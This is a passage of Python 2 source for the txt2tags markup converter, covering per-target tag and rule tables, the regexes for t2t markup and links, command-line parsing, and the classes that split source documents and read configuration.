'\n%cont, fore "white"\n' ,
'img' : '\n%~A~\n%newimage "\a"\n%left\n',
'comment' : '%% \a' ,
'tocOpen' : '%page\n\n\n' ,
'EOD' : '%%EOD'
},
# man groff_man ; man 7 groff
'man': {
'paragraphOpen' : '.P' ,
'title1' : '.SH \a' ,
'title2' : '.SS \a' ,
'title3' : '.SS \a' ,
'title4' : '.SS \a' ,
'title5' : '.SS \a' ,
'blockVerbOpen' : '.nf' ,
'blockVerbClose' : '.fi\n' ,
'blockQuoteOpen' : '.RS' ,
'blockQuoteClose' : '.RE' ,
'fontBoldOpen' : '\\fB' ,
'fontBoldClose' : '\\fR' ,
'fontItalicOpen' : '\\fI' ,
'fontItalicClose' : '\\fR' ,
'listOpen' : '.RS' ,
'listItemOpen' : '.IP \(bu 3\n',
'listClose' : '.RE' ,
'numlistOpen' : '.RS' ,
'numlistItemOpen' : '.IP \a. 3\n',
'numlistClose' : '.RE' ,
'deflistItem1Open' : '.TP\n' ,
'bar1' : '\n\n' ,
'bar2' : '\n\n' ,
'url' : '\a' ,
'urlMark' : '\a (\a)',
'email' : '\a' ,
'emailMark' : '\a (\a)',
'img' : '\a' ,
'tableOpen' : '.TS\n~A~~B~tab(^); ~C~.',
'tableClose' : '.TE' ,
'tableRowOpen' : ' ' ,
'tableCellSep' : '^' ,
'tableAlignCenter' : 'center, ',
'tableBorder' : 'allbox, ',
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'comment' : '.\\" \a'
},
'pm6': {
'paragraphOpen' : '<@Normal:>' ,
'title1' : '\n<@Title1:>\a',
'title2' : '\n<@Title2:>\a',
'title3' : '\n<@Title3:>\a',
'title4' : '\n<@Title4:>\a',
'title5' : '\n<@Title5:>\a',
'blockVerbOpen' : '<@PreFormat:>' ,
'blockQuoteLine' : '<@Quote:>' ,
'fontMonoOpen' : '<FONT "Lucida Console"><SIZE 9>' ,
'fontMonoClose' : '<SIZE$><FONT$>',
'fontBoldOpen' : '<B>' ,
'fontBoldClose' : '<P>' ,
'fontItalicOpen' : '<I>' ,
'fontItalicClose' : '<P>' ,
'fontUnderlineOpen' : '<U>' ,
'fontUnderlineClose' : '<P>' ,
'listOpen' : '<@Bullet:>' ,
'listItemOpen' : '\x95\t' , # \x95 == ~U
'numlistOpen' : '<@Bullet:>' ,
'numlistItemOpen' : '\x95\t' ,
'bar1' : '\a' ,
'bar2' : '\a' ,
'url' : '<U>\a<P>' , # underline
'urlMark' : '\a <U>\a<P>' ,
'email' : '\a' ,
'emailMark' : '\a \a' ,
'img' : '\a'
}
}
# make the HTML -> XHTML inheritance
xhtml = alltags['html'].copy()
for key in xhtml.keys(): xhtml[key] = string.lower(xhtml[key])
# some like HTML tags as lowercase, some don't... (headers out)
if HTML_LOWER: alltags['html'] = xhtml.copy()
xhtml.update(alltags['xhtml'])
alltags['xhtml'] = xhtml.copy()
# compose the target tags dictionary
tags = {}
target_tags = alltags[target].copy()
for key in keys: tags[key] = '' # create empty keys
for key in target_tags.keys():
tags[key] = maskEscapeChar(target_tags[key]) # populate
return tags
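# Quick reference (illustrative): getTags() returns one dictionary with every
# key listed above; keys the target doesn't define come as empty strings, and
# the bell char '\a' inside a tag marks where the content will be placed.
#
#   tags = getTags('txt')
#   tags['urlMark']     # '\a (\a)' -- label first, then the URL in parens
#   tags['tableOpen']   # ''        -- plain text has no table tags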
##############################################################################
def getRules(target):
"Returns all the target-specific syntax rules"
ret = {}
allrules = [
# target rules (ON/OFF)
'linkable', # target supports external links
'tableable', # target supports tables
'imglinkable', # target supports images as links
'imgalignable', # target supports image alignment
'imgasdefterm', # target supports image as definition term
'autonumberlist', # target supports numbered lists natively
'autonumbertitle', # target supports numbered titles natively
	'parainsidelist',       # list items support paragraphs
'spacedlistitem', # lists support blank lines between items
'listnotnested', # lists cannot be nested
'quotenotnested', # quotes cannot be nested
'verbblocknotescaped', # don't escape specials in verb block
'verbblockfinalescape', # do final escapes in verb block
	'escapeurl',            # escape specials in link URL
'onelinepara', # dump paragraph as a single long line
'tabletitlerowinbold', # manually bold any cell on table titles
'tablecellstrip', # strip extra spaces from each table cell
'barinsidequote', # bars are allowed inside quote blocks
'finalescapetitle', # perform final escapes on title lines
# target code beautify (ON/OFF)
'indentverbblock', # add leading spaces to verb block lines
'breaktablecell', # break lines after any table cell
'breaktablelineopen', # break line after opening table line
'notbreaklistopen', # don't break line after opening a new list
'notbreakparaopen', # don't break line after opening a new para
'keepquoteindent', # don't remove the leading TABs on quotes
'keeplistindent', # don't remove the leading spaces on lists
'blankendmotherlist', # append a blank line at the mother list end
'blankendtable', # append a blank line at the table end
	'tagnotindentable',     # tags must be placed at the line beginning
# value settings
'listmaxdepth', # maximum depth for lists
'tablecellaligntype' # type of table cell align: cell, column
]
rules_bank = {
'txt' : {
'indentverbblock':1,
'spacedlistitem':1,
'parainsidelist':1,
'keeplistindent':1,
'barinsidequote':1,
'blankendmotherlist':1
},
'html': {
'indentverbblock':1,
'linkable':1,
'escapeurl':1,
'imglinkable':1,
'imgalignable':1,
'imgasdefterm':1,
'autonumberlist':1,
'spacedlistitem':1,
'parainsidelist':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'blankendtable':1,
'breaktablecell':1,
'breaktablelineopen':1,
'keeplistindent':1,
'keepquoteindent':1,
'barinsidequote':1,
'tablecellaligntype':'cell'
},
#TIP xhtml inherits all HTML rules
'xhtml': {
},
'sgml': {
'linkable':1,
'escapeurl':1,
'autonumberlist':1,
'spacedlistitem':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'blankendtable':1,
'quotenotnested':1,
'keeplistindent':1,
'keepquoteindent':1,
'barinsidequote':1,
'finalescapetitle':1,
'tablecellaligntype':'column'
},
'mgp' : {
'blankendmotherlist':1,
'tagnotindentable':1,
'spacedlistitem':1,
'imgalignable':1,
},
'tex' : {
'autonumberlist':1,
'autonumbertitle':1,
'spacedlistitem':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'tabletitlerowinbold':1,
'blankendtable':1,
'verbblocknotescaped':1,
'keeplistindent':1,
'listmaxdepth':4,
'barinsidequote':1,
'finalescapetitle':1,
'tablecellaligntype':'column'
},
'moin': {
'spacedlistitem':1,
'linkable':1,
'blankendmotherlist':1,
'keeplistindent':1,
'tableable':1,
'barinsidequote':1,
'blankendtable':1,
'tabletitlerowinbold':1,
'tablecellstrip':1,
'tablecellaligntype':'cell'
},
'man' : {
'spacedlistitem':1,
'indentverbblock':1,
'blankendmotherlist':1,
'tagnotindentable':1,
'tableable':1,
'tablecellaligntype':'column',
'tabletitlerowinbold':1,
'tablecellstrip':1,
'blankendtable':1,
'keeplistindent':0,
'barinsidequote':1,
'parainsidelist':0,
},
'pm6' : {
'keeplistindent':1,
'verbblockfinalescape':1,
#TODO add support for these - maybe set a JOINNEXT char and
# do it on addLineBreaks()
'notbreaklistopen':1,
'notbreakparaopen':1,
'barinsidequote':1,
'onelinepara':1,
}
}
# get the target specific rules
if target == 'xhtml':
myrules = rules_bank['html'].copy() # inheritance
myrules.update(rules_bank['xhtml']) # get XHTML specific
else:
myrules = rules_bank[target].copy()
# populate return dictionary
for key in allrules: ret[key] = 0 # reset all
ret.update(myrules) # get rules
return ret
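# Quick reference (illustrative): every key from 'allrules' is present in the
# returned dictionary, zeroed by default, with the target's own settings on top.
#
#   rules = getRules('tex')
#   rules['tableable']      # 1 -- tex supports tables
#   rules['listmaxdepth']   # 4 -- a value setting, not just ON/OFF
#   rules['linkable']       # 0 -- not listed for tex, stays at the default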
##############################################################################
def getRegexes():
"Returns all the regexes used to find the t2t marks"
bank = {
'blockVerbOpen':
re.compile(r'^```\s*$'),
'blockVerbClose':
re.compile(r'^```\s*$'),
'blockRawOpen':
re.compile(r'^"""\s*$'),
'blockRawClose':
re.compile(r'^"""\s*$'),
'quote':
re.compile(r'^\t+'),
'1lineVerb':
re.compile(r'^``` (?=.)'),
'1lineRaw':
re.compile(r'^""" (?=.)'),
# mono, raw, bold, italic, underline:
# - marks must be glued with the contents, no boundary spaces
	#  - they are greedy, so ****bold**** turns into <b>**bold**</b>
'fontMono':
re.compile( r'``([^\s](|.*?[^\s])`*)``'),
'raw':
re.compile( r'""([^\s](|.*?[^\s])"*)""'),
'fontBold':
re.compile(r'\*\*([^\s](|.*?[^\s])\**)\*\*'),
'fontItalic':
re.compile( r'//([^\s](|.*?[^\s])/*)//'),
'fontUnderline':
re.compile( r'__([^\s](|.*?[^\s])_*)__'),
'list':
re.compile(r'^( *)(-) (?=[^ ])'),
'numlist':
re.compile(r'^( *)(\+) (?=[^ ])'),
'deflist':
re.compile(r'^( *)(:) (.*)$'),
'bar':
re.compile(r'^(\s*)([_=-]{20,})\s*$'),
'table':
re.compile(r'^ *\|\|? '),
'blankline':
re.compile(r'^\s*$'),
'comment':
re.compile(r'^%'),
	# auxiliary tag regexes
'_imgAlign' : re.compile(r'~A~',re.I),
'_tableAlign' : re.compile(r'~A~',re.I),
'_anchor' : re.compile(r'~A~',re.I),
'_tableBorder' : re.compile(r'~B~',re.I),
'_tableColAlign': re.compile(r'~C~',re.I),
}
# special char to place data on TAGs contents (\a == bell)
bank['x'] = re.compile('\a')
# %%date [ (formatting) ]
bank['date'] = re.compile(r'%%date\b(\((?P<fmt>.*?)\))?', re.I)
# almost complicated title regexes ;)
titskel = r'^ *(?P<id>%s)(?P<txt>%s)\1(\[(?P<label>\w*)\])?\s*$'
bank[ 'title'] = re.compile(titskel%('[=]{1,5}','[^=](|.*[^=])'))
bank['numtitle'] = re.compile(titskel%('[+]{1,5}','[^+](|.*[^+])'))
### complicated regexes begin here ;)
#
# textual descriptions on --help's style: [...] is optional, | is OR
	### first, some auxiliary variables
#
# [image.EXT]
patt_img = r'\[([\w_,.+%$#@!?+~/-]+\.(png|jpe?g|gif|eps|bmp))\]'
# link things
urlskel = {
'proto' : r'(https?|ftp|news|telnet|gopher|wais)://',
'guess' : r'(www[23]?|ftp)\.', # w/out proto, try to guess
'login' : r'A-Za-z0-9_.-', # for ftp://login@domain.com
'pass' : r'[^ @]*', # for ftp://login:password@dom.com
'chars' : r'A-Za-z0-9%._/~:,=$@&-',# %20(space), :80(port), D&D
'anchor': r'A-Za-z0-9%._-', # %nn(encoded)
'form' : r'A-Za-z0-9/%&=+.,@*_-', # .,@*_-(as is)
'punct' : r'.,;:!?'
}
# username [ :password ] @
patt_url_login = r'([%s]+(:%s)?@)?'%(urlskel['login'],urlskel['pass'])
# [ http:// ] [ username:password@ ] domain.com [ / ]
# [ #anchor | ?form=data ]
retxt_url = r'\b(%s%s|%s)[%s]+\b/*(\?[%s]+)?(#[%s]+)?'%(
urlskel['proto'],patt_url_login, urlskel['guess'],
urlskel['chars'],urlskel['form'],urlskel['anchor'])
# filename | [ filename ] #anchor
retxt_url_local = r'[%s]+|[%s]*(#[%s]+)'%(
urlskel['chars'],urlskel['chars'],urlskel['anchor'])
# user@domain [ ?form=data ]
patt_email = r'\b[%s]+@([A-Za-z0-9_-]+\.)+[A-Za-z]{2,4}\b(\?[%s]+)?'%(
urlskel['login'],urlskel['form'])
# saving for future use
bank['_urlskel'] = urlskel
### and now the real regexes
#
bank['email'] = re.compile(patt_email,re.I)
# email | url
bank['link'] = re.compile(r'%s|%s'%(retxt_url,patt_email), re.I)
# \[ label | imagetag url | email | filename \]
bank['linkmark'] = re.compile(
r'\[(?P<label>%s|[^]]+) (?P<link>%s|%s|%s)\]'%(
patt_img, retxt_url, patt_email, retxt_url_local),
re.L+re.I)
# image
bank['img'] = re.compile(patt_img, re.L+re.I)
# all macros
bank['macro'] = bank['date']
# special things
bank['special'] = re.compile(r'^%!\s*')
return bank
### END OF regex nightmares
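# Worked example (illustrative): the composed 'title' regex above breaks a
# line like '== My Title ==[intro]' into id='==' (the title level comes from
# its length), txt=' My Title ' (stripped later by TitleMaster) and
# label='intro'; 'numtitle' does the same for '++' style numbered titles.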
##############################################################################
def echo(msg): # for quick debug
print '\033[32;1m%s\033[m'%msg
def Quit(msg, exitcode=0):
print msg
sys.exit(exitcode)
def Error(msg):
sys.stderr.write(_("%s: Error: ")%my_name + "%s\n"%msg)
sys.stderr.flush()
sys.exit(1)
def ShowTraceback():
try:
from traceback import print_exc
print_exc() ; print ; print
except: pass
def Message(msg,level):
if level <= VERBOSE:
prefix = '-'*5
print "%s %s"%(prefix*level, msg)
def Debug(msg,color=0,linenr=None):
"0gray=init,1red=conf,3yellow=line,6cyan=block,2green=detail,5pink=gui"
if not DEBUG: return
if COLOR_DEBUG: msg = '\033[3%s;1m%s\033[m'%(color,msg)
if linenr is not None: msg = "LINE %04d: %s"%(linenr,msg)
print "** %s"%msg
def Readfile(file, remove_linebreaks=0):
if file == '-':
try: data = sys.stdin.readlines()
except: Error(_('You must feed me with data on STDIN!'))
else:
try: f = open(file); data = f.readlines() ; f.close()
except: Error(_("Cannot read file:")+"\n %s"%file)
if remove_linebreaks:
data = map(lambda x:re.sub('[\n\r]+$','',x), data)
Message(_("Readed file (%d lines): %s")%(len(data),file),2)
return data
def Savefile(file, contents):
try: f = open(file, 'wb')
except: Error(_("Cannot open file for writing:")+"\n %s"%file)
if type(contents) == type([]): doit = f.writelines
else: doit = f.write
doit(contents) ; f.close()
def showdic(dic):
for k in dic.keys(): print "%15s : %s" % (k,dic[k])
def dotted_spaces(txt=''):
return string.replace(txt,' ','.')
def get_rc_path():
rc_file = RC
# try to get rc dir name (usually $HOME on win and linux)
rc_dir = os.environ.get('HOME')
if rc_dir:
# compose path and return it if the file exists
rc_path = os.path.join(rc_dir, rc_file)
if os.path.isfile(rc_path):
return rc_path
return ''
##############################################################################
class CommandLine:
"""Command Line class - Masters command line
This class checks and extract data from the provided command line.
The --long options and flags are taken from the global OPTIONS,
FLAGS and ACTIONS dictionaries. The short options are registered
here, and also their equivalence to the long ones.
METHODS:
_compose_short_opts() -> str
_compose_long_opts() -> list
Compose the valid short and long options list, on the
'getopt' format.
parse() -> (opts, args)
Call getopt to check and parse the command line.
It expects to receive the command line as a list, and
without the program name (sys.argv[1:]).
get_raw_config() -> [RAW config]
Scans command line and convert the data to the RAW config
format. See ConfigMaster class to the RAW format description.
Optional 'ignore' and 'filter' arguments are used to filter
in or out specified keys.
compose_cmdline(dict) -> [Command line]
Compose a command line list from an already parsed config
dictionary, generated from RAW by ConfigMaster(). Use
this to compose an optimal command line for a group of
options.
	The get_raw_config() calls parse(), so the typical use of this
class is:
raw = CommandLine().get_raw_config(sys.argv[1:])
"""
def __init__(self):
self.all_options = OPTIONS.keys()
self.all_flags = FLAGS.keys()
self.all_actions = ACTIONS.keys()
# short:long options equivalence
self.short_long = {
'h':'help' , 'V':'version',
'n':'enum-title', 'i':'infile' ,
'H':'no-headers', 'o':'outfile',
'v':'verbose' , 't':'target'
}
# compose valid short and long options data for getopt
self.short_opts = self._compose_short_opts()
self.long_opts = self._compose_long_opts()
def _compose_short_opts(self):
"Returns a string like 'hVt:o' with all short options/flags"
ret = []
for opt in self.short_long.keys():
long = self.short_long[opt]
if long in self.all_options: # is flag or option?
opt = opt+':' # option: have param
ret.append(opt)
Debug('Valid SHORT options: %s'%ret)
return string.join(ret, '')
def _compose_long_opts(self):
"Returns a list with all the valid long options/flags"
ret = map(lambda x:x+'=', self.all_options) # add =
ret.extend(self.all_flags) # flag ON
ret.extend(self.all_actions) # acts
ret.extend(map(lambda x:'no-'+x, self.all_flags)) # add no-*
ret.extend(['no-style']) # turn OFF option
ret.extend(['no-encoding']) # turn OFF option
ret.extend(['no-outfile']) # turn OFF option
Debug('Valid LONG options: %s'%ret)
return ret
def _tokenize(self, cmd_string=''):
"Convert a command line string to a list"
#TODO protect quotes contents
return string.split(cmd_string)
def parse(self, cmdline=[]):
"Check/Parse a command line list TIP: no program name!"
# get the valid options
short, long = self.short_opts, self.long_opts
# parse it!
try:
opts, args = getopt.getopt(cmdline, short, long)
except getopt.error, errmsg:
Error(_("%s (try --help)")%errmsg)
return (opts, args)
def get_raw_config(self, cmdline=[], ignore=[], filter=[]):
"Returns the options/arguments found as RAW config"
if not cmdline: return []
ret = []
# we need lists, not strings
if type(cmdline) == type(''): cmdline = self._tokenize(cmdline)
Debug("cmdline: %s"%cmdline)
opts, args = self.parse(cmdline[:])
# get infile, if any
while args:
infile = args.pop(0)
ret.append(['infile', infile])
# parse all options
for name,value in opts:
# remove leading - and --
name = re.sub('^--?', '', name)
# translate short opt to long
if len(name) == 1: name = self.short_long.get(name)
# save it (if allowed)
ret.append([name, value])
# apply 'ignore' and 'filter' rules (filter is stronger)
temp = ret[:] ; ret = []
for name,value in temp:
if (not filter and not ignore) or \
(filter and name in filter) or \
(ignore and name not in ignore):
ret.append( ['all', name, value] )
# add the original command line string as 'realcmdline'
ret.append( ['all', 'realcmdline', cmdline] )
return ret
def compose_cmdline(self, conf={}, no_check=0):
"compose a full (and diet) command line from CONF dict"
if not conf: return []
args = []
dft_options = OPTIONS.copy()
cfg = conf.copy()
valid_opts = self.all_options + self.all_flags
use_short = {'no-headers':'H', 'enum-title':'n'}
# remove useless options
if not no_check and cfg.get('toc-only'):
if cfg.has_key('no-headers'):
del cfg['no-headers']
if cfg.has_key('outfile'):
del cfg['outfile'] # defaults to STDOUT
if cfg.get('target') == 'txt':
del cfg['target'] # already default
args.append('--toc-only') # must be the first
del cfg['toc-only']
# add target type
if cfg.has_key('target'):
args.append('-t '+cfg['target'])
del cfg['target']
# add other options
for key in cfg.keys():
if key not in valid_opts: continue # may be a %!setting
if key in ['outfile','infile']: continue # later
val = cfg[key]
if not val: continue
# default values are useless on cmdline
if val == dft_options.get(key): continue
# -short format
if key in use_short.keys():
args.append('-'+use_short[key])
continue
# --long format
if key in self.all_flags: # add --option
args.append('--'+key)
else: # add --option=value
args.append('--%s=%s'%(key,val))
# the outfile using -o
if cfg.has_key('outfile') and \
cfg['outfile'] != dft_options.get('outfile'):
args.append('-o '+cfg['outfile'])
# place input file(s) always at the end
if cfg.has_key('infile'):
args.append(string.join(cfg['infile'],' '))
# return as a nice list
Debug("Diet command line: %s"%string.join(args,' '), 1)
return args
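# Worked example (illustrative, file name made up): get_raw_config() turns a
# command line into RAW config triplets, translating short options to long
# and keeping the original command line under the 'realcmdline' key.
#
#   CommandLine().get_raw_config(['-t', 'html', 'file.t2t'])
#   # -> [['all', 'infile', 'file.t2t'],
#   #     ['all', 'target', 'html'],
#   #     ['all', 'realcmdline', ['-t', 'html', 'file.t2t']]]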
##############################################################################
class SourceDocument:
"""
SourceDocument class - scan document structure, extract data
	It knows about full files. It reads a file and identifies all
	the area beginnings (Head, Conf, Body). With this info it can
extract each area contents.
Note: the original line break is removed.
DATA:
self.arearef - Save Head, Conf, Body init line number
self.areas - Store the area names which are not empty
self.buffer - The full file contents (with NO \\r, \\n)
METHODS:
get() - Access the contents of an Area. Example:
config = SourceDocument(file).get('conf')
split() - Get all the document Areas at once. Example:
head, conf, body = SourceDocument(file).split()
RULES:
* The document parts are sequential: Head, Conf and Body.
* One ends when the next begins.
* The Conf Area is optional, so a document can have just
Head and Body Areas.
These are the Areas limits:
- Head Area: the first three lines
- Body Area: from the first valid text line to the end
- Conf Area: the comments between Head and Body Areas
Exception: If the first line is blank, this means no
header info, so the Head Area is just the first line.
"""
def __init__(self, filename=''):
self.areas = ['head','conf','body']
self.arearef = []
self.areas_fancy = ''
self.filename = filename
self.buffer = []
if filename: self.scan(filename)
def split(self):
"Returns all document parts, splitted into lists."
return self.get('head'), self.get('conf'), self.get('body')
def get(self, areaname):
"Returns head|conf|body contents from self.buffer"
# sanity
if areaname not in self.areas: return []
if not self.buffer : return []
# go get it
bufini = 1
bufend = len(self.buffer)
if areaname == 'head':
ini = bufini
end = self.arearef[1] or self.arearef[2] or bufend
elif areaname == 'conf':
ini = self.arearef[1]
end = self.arearef[2] or bufend
elif areaname == 'body':
ini = self.arearef[2]
end = bufend
else:
Error("Unknown Area name '%s'"%areaname)
lines = self.buffer[ini:end]
# make sure head will always have 3 lines
while areaname == 'head' and len(lines) < 3:
lines.append('')
return lines
def scan(self, filename):
"Run through source file and identify head/conf/body areas"
Debug("source file: %s"%filename)
Message(_("Loading source document"),1)
buf = Readfile(filename, remove_linebreaks=1)
cfg_parser = ConfigLines().parse_line
buf.insert(0, '') # text start at pos 1
ref = [1,4,0]
if not string.strip(buf[1]): # no header
ref[0] = 0 ; ref[1] = 2
for i in range(ref[1],len(buf)): # find body init:
if string.strip(buf[i]) and ( # ... not blank and
buf[i][0] != '%' or # ... not comment or
cfg_parser(buf[i],'include')[1]): # ... %!include
ref[2] = i ; break
if ref[1] == ref[2]: ref[1] = 0 # no conf area
for i in 0,1,2: # del !existent
if ref[i] >= len(buf): ref[i] = 0 # title-only
if not ref[i]: self.areas[i] = ''
Debug('Head,Conf,Body start line: %s'%ref)
self.arearef = ref # save results
self.buffer = buf
		# fanciness sample: head conf body (1 4 8)
self.areas_fancy = "%s (%s)"%(
string.join(self.areas),
string.join(map(str, map(lambda x:x or '', ref))))
Message(_("Areas found: %s")%self.areas_fancy, 2)
def get_raw_config(self):
"Handy method to get the CONF area RAW config (if any)"
if not self.areas.count('conf'): return []
Message(_("Scanning source document CONF area"),1)
raw = ConfigLines(
file=self.filename, lines=self.get('conf'),
first_line=self.arearef[1]).get_raw_config()
Debug("document raw config: %s"%raw, 1)
return raw
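# Layout sketch (illustrative, sample document made up): for a source file
# whose first three lines are the title/author/date header, followed by
# comment lines holding settings, the areas come out as:
#
#     My Title                     <-- head  (always padded to 3 lines)
#     The Author
#     Last updated: %%date
#     %!target: html               <-- conf  (comments between head and body)
#
#     First paragraph of text...   <-- body  (first valid text line onwards)
#
#   head, conf, body = SourceDocument('doc.t2t').split()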
##############################################################################
class ConfigMaster:
"""ConfigMaster class - the configuration wizard
This class is the configuration master. It knows how to handle
the RAW and PARSED config format. It also performs the sanity
	checks for a given configuration.
DATA:
self.raw - Stores the config on the RAW format
self.parsed - Stores the config on the PARSED format
self.defaults - Stores the default values for all keys
self.off - Stores the OFF values for all keys
self.multi - List of keys which can have multiple values
self.numeric - List of keys which value must be a number
self.incremental - List of keys which are incremental
RAW FORMAT:
	The RAW format is a list of lists, where each mother list item
	is a full configuration entry. Any entry is a 3-item list, on
the following format: [ TARGET, KEY, VALUE ]
Being a list, the order is preserved, so it's easy to use
different kinds of configs, as CONF area and command line,
respecting the precedence.
The special target 'all' is used when no specific target was
defined on the original config.
PARSED FORMAT:
The PARSED format is a dictionary, with all the 'key : value'
found by reading the RAW config. The self.target contents
matters, so this dictionary only contains the target's
config. The configs of other targets are ignored.
The CommandLine and ConfigLines classes have the get_raw_config()
method which convert the configuration found to the RAW format.
Just feed it to parse() and get a brand-new ready-to-use config
dictionary. Example:
>>> raw = CommandLine().get_raw_config(['-n', '-H'])
>>> print raw
[['all', 'enum-title', ''], ['all', 'no-headers', '']]
>>> parsed = ConfigMaster(raw).parse()
>>> print parsed
{'enum-title': 1, 'headers': 0}
"""
def __init__(self, raw=[], target=''):
self.raw = raw
self.target = target
self.parsed = {}
self.dft_options = OPTIONS.copy()
self.dft_flags = FLAGS.copy()
self.dft_actions = ACTIONS.copy()
self.dft_settings = SETTINGS.copy()
self.defaults = self._get_defaults()
self.off = self._get_off()
self.multi = ['infile', 'options','preproc','postproc']
self.incremental = ['verbose']
self.numeric = ['toc-level','split']
def _get_defaults(self):
"Get the default values for all config/options/flags"
empty = {}
for kw in CONFIG_KEYWORDS: empty[kw] = ''
empty.update(self.dft_options)
empty.update(self.dft_flags)
empty.update(self.dft_actions)
empty.update(self.dft_settings)
empty['realcmdline'] = '' # internal use only
empty['sourcefile'] = '' # internal use only
return empty
def _get_off(self):
"Turns OFF all the config/options/flags"
off = {}
for key in self.defaults.keys():
kind = type(self.defaults[key])
if kind == type(9):
off[key] = 0
elif kind == type(''):
off[key] = ''
elif kind == type([]):
off[key] = []
else:
				Error('ConfigMaster: %s: Unknown type'%key)
return off
def _check_target(self):
"Checks if the target is already defined. If not, do it"
if not self.target:
self.target = self.find_value('target')
def get_target_raw(self):
"Returns the raw config for self.target or 'all'"
ret = []
self._check_target()
for entry in self.raw:
if entry[0] in [self.target, 'all']:
ret.append(entry)
return ret
def add(self, key, val):
"Adds the key:value pair to the config dictionary (if needed)"
# %!options
if key == 'options':
ignoreme = self.dft_actions.keys() + ['target']
raw_opts = CommandLine().get_raw_config(
val, ignore=ignoreme)
for target, key, val in raw_opts:
self.add(key, val)
return
# the no- prefix turns OFF this key
if key[:3] == 'no-':
key = key[3:] # remove prefix
val = self.off.get(key) # turn key OFF
# is this key valid?
if key not in self.defaults.keys():
Debug('Bogus Config %s:%s'%(key,val),1)
return
# is this value the default one?
if val == self.defaults.get(key):
# if default value, remove previous key:val
if self.parsed.has_key(key):
del self.parsed[key]
# nothing more to do
return
		# flags turned ON come empty. we'll add the value 1 now
if val == '' and \
key in self.dft_flags.keys()+self.dft_actions.keys():
val = 1
# multi value or single?
if key in self.multi:
# first one? start new list
if not self.parsed.has_key(key):
self.parsed[key] = []
self.parsed[key].append(val)
# incremental value? so let's add it
elif key in self.incremental:
self.parsed[key] = (self.parsed.get(key) or 0) + val
else:
self.parsed[key] = val
fancykey = dotted_spaces("%12s"%key)
Message(_("Added config %s : %s")%(fancykey,val),3)
def get_outfile_name(self, config={}):
"Dirname is the same for {in,out}file"
infile, outfile = config['sourcefile'], config['outfile']
if infile == STDIN and not outfile: outfile = STDOUT
if not outfile and (infile and config.get('target')):
basename = re.sub('\.(txt|t2t)$','',infile)
outfile = "%s.%s"%(basename, config['target'])
Debug(" infile: '%s'"%infile , 1)
Debug("outfile: '%s'"%outfile, 1)
return outfile
def sanity(self, config, gui=0):
"Basic config sanity checkings"
if not config: return {}
target = config.get('target')
# --toc-only doesn't require target specification
if not target and config.get('toc-only'):
target = 'txt'
		# on GUI, some checks are skipped
if not gui:
# we *need* a target
if not target:
Error(_('No target specified (try --help)')+\
'\n\n'+\
_('Maybe trying to convert an old v1.x file?'))
# and of course, an infile also
if not config['infile']:
Error(_('Missing input file (try --help)'))
# is the target valid?
if not TARGETS.count(target):
Error(_("Invalid target '%s' (try --help)"
)%target)
# ensure all keys are present
empty = self.defaults.copy() ; empty.update(config)
config = empty.copy()
		# check integer options
for key in config.keys():
if key in self.numeric:
try: config[key] = int(config[key])
except: Error(_('--%s value must be a number'
)%key)
# check split level value
if config['split'] not in [0,1,2]:
Error(_('Option --split must be 0, 1 or 2'))
# --toc-only is stronger than others
if config['toc-only']:
config['headers'] = 0
config['toc'] = 0
config['split'] = 0
config['gui'] = 0
config['outfile'] = STDOUT
		# splitting is disabled for now (future: HTML only, no STDOUT)
config['split'] = 0
# restore target
config['target'] = target
# set output file name
config['outfile'] = self.get_outfile_name(config)
# checking suicide
if config['sourcefile'] == config['outfile'] and \
config['outfile'] != STDOUT and not gui:
Error(_("Input and Output files are the same: %s")%(
config['outfile']))
return config
def parse(self):
"Returns the parsed config for the current target"
raw = self.get_target_raw()
for target, key, value in raw:
self.add(key, value)
Message(_("Added the following keys: %s")%string.join(
self.parsed.keys(),', '),2)
return self.parsed.copy()
def find_value(self, key='', target=''):
"Scans ALL raw config to find the desired key"
ret = []
# scan and save all values found
for targ, k, val in self.raw:
if targ in [target, 'all'] and k == key:
ret.append(val)
if not ret: return ''
# if not multi value, return only the last found
if key in self.multi: return ret
else : return ret[-1]
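# Behaviour sketch (illustrative, keys and file names made up): the 'no-'
# prefix turns a key back OFF, and keys listed in self.multi accumulate
# into lists instead of overwriting each other.
#
#   raw = [['all', 'enum-title', ''], ['all', 'no-enum-title', ''],
#          ['all', 'infile', 'a.t2t'], ['all', 'infile', 'b.t2t']]
#   ConfigMaster(raw).parse()
#   # -> roughly {'infile': ['a.t2t', 'b.t2t']}  (enum-title ended up OFF)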
########################################################################
class ConfigLines:
"""ConfigLines class - the config file data extractor
	This class reads and parses the config lines on the %!key:val
	format, converting them to RAW config. It deals with the user
config file (RC file), source document CONF area and
%!includeconf directives.
Call it passing a file name or feed the desired config lines.
Then just call the get_raw_config() method and wait to
receive the full config data on the RAW format. This method
also follows the possible %!includeconf directives found on
the config lines. Example:
raw = ConfigLines(file=".txt2tagsrc").get_raw_config()
The parse_line() method is also useful to be used alone,
to identify and tokenize a single config line. For example,
to get the %!include command components, on the source
document BODY:
target, key, value = ConfigLines().parse_line(body_line)
"""
def __init__(self, file='', lines=[], first_line=1):
self.file = file or 'NOFILE'
self.lines = lines
self.first_line = first_line
def load_lines(self):
"Make sure we've loaded the file contents into buffer"
if not self.lines and not self.file:
Error("ConfigLines: No file or lines provided")
if not self.lines:
self.lines = self.read_config_file(self.file)
def read_config_file(self, filename=''):
"Read a Config File contents, aborting on invalid line"
if not filename: return []
errormsg = _("Invalid CONFIG line on %s")+"\n%03d:%s"
lines = Readfile(filename, remove_linebreaks=1)
# sanity: try to find invalid config lines
for i in range(len(lines)):
line = string.rstrip(lines[i])
if not line: continue # empty
if line[0] != '%': Error(errormsg%(filename,i+1,line))
return lines
def include_config_file(self, file=''):
"Perform the %!includeconf action, returning RAW config"
if not file: return []
# current dir relative to the current file (self.file)
current_dir = os.path.dirname(self.file)
file = os.path.join(current_dir, file)
# read and parse included config file contents
lines = self.read_config_file(file)
return ConfigLines(file=file, lines=lines).get_raw_config()
def get_raw_config(self):
"Scan buffer and extract all config as RAW (including includes)"
ret = []
self.load_lines()
first = self.first_line
for i in range(len(self.lines)):
line = self.lines[i]
Message(_("Processing line %03d: %s")%(first+i,line),2)
target, key, val = self.parse_line(line)
if not key: continue # no config on this line
if key == 'includeconf':
more_raw = self.include_config_file(val)
ret.extend(more_raw)
Message(_("Finished Config file inclusion: %s"
)%(val),2)
else:
